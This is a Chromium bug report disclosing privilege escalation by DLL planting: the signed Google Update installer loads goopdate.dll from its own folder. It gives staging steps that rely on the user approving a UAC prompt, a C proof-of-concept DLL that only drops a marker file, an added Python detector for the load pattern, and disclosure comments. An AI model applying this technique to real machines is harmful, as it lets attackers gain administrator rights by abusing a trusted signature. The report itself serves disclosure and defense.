Security: EoP with ChromeSetup.exe via goopdate.dll
Reported by lacike3...@gmail.com, Feb 4 2017
Issue description
VULNERABILITY DETAILS
The online installer drops a file, GoogleUpdate.exe, which tries to load goopdate.dll from its own directory.
This behavior can be exploited by an attacker for escalation of privileges with a little tricky packaging of the signed application GoogleUpdate.exe together with a malicious DLL. See details below.
VERSION
Chrome Version: Google Update Setup 1.3.32.7, online installer of stable Google Chrome browser (filename after download: ChromeSetup.exe)
Operating System: Win 7 Enterprise, 32 bit, build 7601 Service Pack 1
REPRODUCTION CASE
Attached is a PoC exploit using the valid GoogleUpdate.exe, which is signed by Google Inc. (the password for the attached zip file is "infected").
1) The user launches chrome_eopse.exe from the attacker.
2) chrome_eopse.exe drops the valid GoogleSetup.exe and the malicious goopdate.dll to %TEMP%.
3) chrome_eopse.exe executes GoogleSetup.exe with the run-as-administrator flag.
4) The user sees a UAC prompt for GoogleSetup.exe with Google Inc as a verified publisher, so the user will probably approve elevated rights for the valid GoogleSetup.exe.
5) GoogleSetup.exe loads the malicious goopdate.dll.
6) The malicious code from goopdate.dll is executed with administrator rights.
PoC sources of the "malicious" dll:
--------------------
#include <windows.h>
#include <stdio.h>

/* Entry point the loader calls when GoogleUpdate.exe loads the DLL; the marker
   file and the message box only prove that the code ran in the elevated process. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason != DLL_PROCESS_ATTACH)
        return TRUE;            /* run the marker once, not on every thread attach */
    FILE *hfile = fopen("C:\\pwned.txt", "w");
    if (hfile != NULL) {        /* skip the marker file if it cannot be created */
        fputs("PWNED\n", hfile);
        fclose(hfile);
    }
    MessageBox(0, "You have been pwned, see C:\\pwned.txt !\n", "Pwned", MB_ICONINFORMATION);
    return TRUE;
}
--------------------
NOTE
As a malware researcher I have already met a malware sample which exploited a similar flaw in other programs for privilege escalation.
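A defender-side detection for the load path described in this report, as an added example that is not part of the bug report or of Chromium's code: it scans Sysmon-style ImageLoaded events and flags the updater binaries named above loading goopdate.dll from outside the Google install tree, beside the installer, unsigned, or in an elevated process. The install roots and the sample events are constructed assumptions for this example.

```python
import json
import ntpath

# Installer binaries named in the report that load goopdate.dll at start-up.
UPDATER_IMAGES = {"googleupdate.exe", "googlesetup.exe", "chromesetup.exe"}
# Where Google Update's own goopdate.dll legitimately lives (assumed install layout).
TRUSTED_ROOTS = ("c:\\program files\\google\\", "c:\\program files (x86)\\google\\")


def classify(event):
    """Return a finding for a Sysmon-style ImageLoaded (event 7) record, else None."""
    if event.get("EventId") != 7:
        return None
    image, loaded = event["Image"].lower(), event["ImageLoaded"].lower()
    if ntpath.basename(image) not in UPDATER_IMAGES or ntpath.basename(loaded) != "goopdate.dll":
        return None
    in_trusted_root = loaded.startswith(TRUSTED_ROOTS)
    signed = str(event.get("Signed", "")).lower() == "true"
    if in_trusted_root and signed:
        return None  # the normal updater loading its own signed DLL
    reasons = []
    if not in_trusted_root:
        reasons.append("goopdate.dll loaded from outside the Google install tree")
    if ntpath.dirname(image) == ntpath.dirname(loaded):
        reasons.append("DLL staged beside the installer")
    if not signed:
        reasons.append("DLL unsigned")
    if event.get("IntegrityLevel", "").lower() == "high":
        reasons.append("process elevated")
    return image + ": " + "; ".join(reasons)


def scan(lines):
    """Run classify() over newline-delimited JSON events and collect the findings."""
    findings = []
    for line in lines:
        finding = classify(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry (not real logs): a benign load and the report's scenario.
SAMPLE_LOG = [
    json.dumps({"EventId": 7, "Image": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe",
                "ImageLoaded": r"C:\Program Files (x86)\Google\Update\1.3.32.7\goopdate.dll",
                "Signed": "true", "IntegrityLevel": "High"}),
    json.dumps({"EventId": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\GoogleSetup.exe",
                "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\goopdate.dll",
                "Signed": "false", "IntegrityLevel": "High"}),
    json.dumps({"EventId": 1, "Image": r"C:\Windows\System32\notepad.exe"}),
]
```

Running `scan(SAMPLE_LOG)` yields one finding, for the %TEMP% load; the Program Files load is left alone.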
Feb 6 2017
Thank you for your reply. So if you don't consider running malicious code from a binary signed by Google Inc. to be a security issue that deserves a fix, I would like to publicly disclose this case (including a demonstration of the PoC from the report) during my talk at a security conference next month.
Mar 8 2017
Issue 699545 has been merged into this issue.
May 15 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by dominickn@chromium.org, Feb 6 2017